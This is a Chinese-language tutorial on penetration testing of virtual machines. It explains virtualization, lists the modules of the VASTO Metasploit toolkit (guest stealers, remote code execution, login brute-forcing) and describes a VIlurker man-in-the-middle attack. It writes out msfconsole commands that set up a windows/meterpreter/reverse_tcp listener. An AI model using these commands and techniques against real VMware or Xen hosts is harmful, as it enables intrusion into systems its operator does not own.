針對(duì)虛擬機(jī)的滲透測(cè)試
如今虛擬化在各個(gè)企業(yè)中應(yīng)用的越來(lái)越多,且火熱的云計(jì)算也依托于此技術(shù)。虛擬化技術(shù)確實(shí)能夠使物理資源的利用更加靈活和便捷,那么虛擬機(jī)的安全性如何?相比傳統(tǒng)架構(gòu),是否像傳說(shuō)中的一樣安全?
什么是虛擬化
虛擬化是指計(jì)算機(jī)元件在虛擬的基礎(chǔ)上而不是真實(shí)的基礎(chǔ)上運(yùn)行。虛擬化技術(shù)可以擴(kuò)大硬件的容量,簡(jiǎn)化軟件的重新配置過(guò)程。CPU的虛擬化技術(shù)可以單CPU模擬多CPU并行,允許一個(gè)平臺(tái)同時(shí)運(yùn)行多個(gè)操作系統(tǒng),并且應(yīng)用程序都可以在相互獨(dú)立的空間內(nèi)運(yùn)行而互不影響,從而顯著提高計(jì)算機(jī)的工作效率。我們先來(lái)看看虛擬機(jī)的層次結(jié)構(gòu)圖。
虛擬機(jī)完全獨(dú)立于其底層物理硬件。 例如,你可以為虛擬機(jī)配置與底層硬件上存在的物理組件完全不同的虛擬組件(例如,CPU、網(wǎng)卡、SCSI 控制器)。 同一物理服務(wù)器上的各個(gè)虛擬機(jī)甚至可以運(yùn)行不同類型的操作系統(tǒng)(Windows、Linux 等)
針對(duì)虛擬機(jī)的滲透測(cè)試
VASTO是一個(gè)專用的虛擬機(jī)滲透測(cè)試工具,支持VMware, Oracle和Xen,可以與神器Metasploit有很好的結(jié)合。使用前需要先解壓,然后復(fù)制metasploit文件夾下中
VASTO的主要模塊如下,功能還是比較強(qiáng)大的
abiquo_guest_stealer – Abiquo guest stealer
abiquo_poison – Abiquo poison
eucalyptus_bouncer – Eucalyptus Bouncer
eucalyptus_poison – Eucalyptus Poison
oraclevm_oravma_fileread – Oracle VM agent remote code execution
vmware_autopwner – VMautopwn
vmware_guest_stealer – VMware Guest Stealer
vmware_login – VMware Login check scanner
vmware_session_rider – VMware Session Rider
vmware_studio_upload – VMware Studio<2.0.0.946-172280 Remote Code Execution
vmware_updatemanager_traversal – Update manager path traversal
vmware_version – VMware products fingerprintervmware_vilurker – VIlurker VIclient attack
vmware_webaccess_portscan – VMware Web Access Relay Port Scanner
xen_login – Xen Login Check Scanner
oracle_oravma_exec – Oracle VM agent remote code execution
vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec
vmware_tomcat_killer – VMware tomcat killer
Versionsscanner Modul:
用于判斷VM的版本等信息
Login Scanner Modul:
這個(gè)模塊可以使用字典嘗試暴力登錄虛擬機(jī)
vilurker module
這個(gè)模塊原理即利用ettercap等進(jìn)行中間人攻擊,欺騙成功后,當(dāng)被攻擊者(client)訪問(wèn)server時(shí)會(huì)彈出窗體,若點(diǎn)擊即反彈一個(gè)meterpreter。
先multi/handler監(jiān)聽(tīng)
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <Local Host IP here>
msf exploit(handler) > exploit
欺騙過(guò)程如下
返回shell(meterpreter)